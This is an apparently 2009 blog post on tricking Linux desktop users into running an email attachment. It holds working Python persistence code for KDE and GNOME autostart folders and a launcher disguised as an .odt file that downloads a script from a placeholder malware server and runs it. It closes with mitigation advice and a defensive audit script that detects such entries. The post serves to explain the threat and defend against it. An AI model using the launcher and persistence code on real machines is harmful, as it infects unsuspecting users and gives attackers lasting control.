Insert Malware on GNOME or KDE as Attachment
February 12th, 2009
The premise of this type of ‘Malware’ is simple:
Get a user to run an executable attachment you sent them via email.
KDE:
    import os

    # Persistence: link the dropped script into KDE's per-user Autostart directory
    uname = os.getlogin()
    drop_dir = "/home/%s/.kde/Autostart" % uname
    os.makedirs(drop_dir)
    os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir + "/s.py")
GNOME:
    import os

    # Persistence: a .desktop entry in GNOME's per-user autostart directory
    relauncher_str = """
    [Desktop Entry]
    Type=Application
    Name=Malware
    Exec=python .local/.hidden/s.py
    Icon=system-run
    """

    uname = os.getlogin()
    drop_dir = "/home/%s/.config/autostart" % uname
    os.makedirs(drop_dir)
    f = open(drop_dir + "/Malware.desktop", "w")
    f.write(relauncher_str)
    f.close()
Launcher:
    [Desktop Entry]
    Type=Application
    Name=some_text.odt
    Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi; python $DROP/s.py'
    Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
Solutions for the problem:
The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: even on Linux this advice should be taken seriously.
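Beyond not clicking, the persistence shown above can be checked for after the fact. The following audit script is an added example, not code from the original post: it scans the two autostart directories named above and flags symlinks or `Exec=` lines that point into hidden paths or call a download tool. The function names, the two regular-expression heuristics and the sample home directory built in `demo()` are assumptions of this example.

```python
import os
import re
import tempfile

# Autostart locations named in the post, relative to a user's home directory.
AUTOSTART_DIRS = (".kde/Autostart", ".config/autostart")
# Heuristics chosen for this example: a download tool, or a dot-prefixed path part.
FETCH = re.compile(r"\b(wget|curl)\b")
HIDDEN = re.compile(r"(^|[\s/=~])\.[A-Za-z0-9_]")

def classify_exec(cmd):
    """Return a reason string if an Exec= command looks suspicious, else None."""
    if FETCH.search(cmd):
        return "downloads code"
    return "runs from hidden path" if HIDDEN.search(cmd) else None

def desktop_exec(path):
    """Return the Exec= value of a .desktop file, or '' if it has none."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            if line.strip().startswith("Exec="):
                return line.strip()[len("Exec="):]
    return ""

def audit_autostart(home):
    """Return sorted (relative path, reason) findings under home's autostart dirs."""
    findings = []
    for rel in AUTOSTART_DIRS:
        base = os.path.join(home, rel)
        for name in (os.listdir(base) if os.path.isdir(base) else []):
            path, reason = os.path.join(base, name), None
            if os.path.islink(path):  # KDE variant: symlink to a hidden script
                if HIDDEN.search(os.readlink(path)):
                    reason = "symlink into hidden path"
            elif name.endswith(".desktop") and os.path.isfile(path):  # GNOME variant
                reason = classify_exec(desktop_exec(path))
            if reason:
                findings.append((os.path.join(rel, name), reason))
    return sorted(findings)

def demo():
    """Audit a constructed home directory: one benign entry, two suspicious ones."""
    home = tempfile.mkdtemp()
    for rel in AUTOSTART_DIRS:
        os.makedirs(os.path.join(home, rel))
    os.symlink("/home/user/.local/.hidden/s.py", os.path.join(home, ".kde/Autostart/s.py"))
    for name, cmd in (("Malware.desktop", "python .local/.hidden/s.py"), ("clock.desktop", "/usr/bin/clock")):
        with open(os.path.join(home, ".config/autostart", name), "w") as fh:
            fh.write("[Desktop Entry]\nType=Application\nExec=%s\n" % cmd)
    return audit_autostart(home)
```

Run `audit_autostart(os.path.expanduser("~"))` against a real account; `classify_exec` can also be applied to the `Exec=` line of a received `.desktop` attachment before it is opened.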
More information on http://www.geekzone.co.nz/foobar/6229

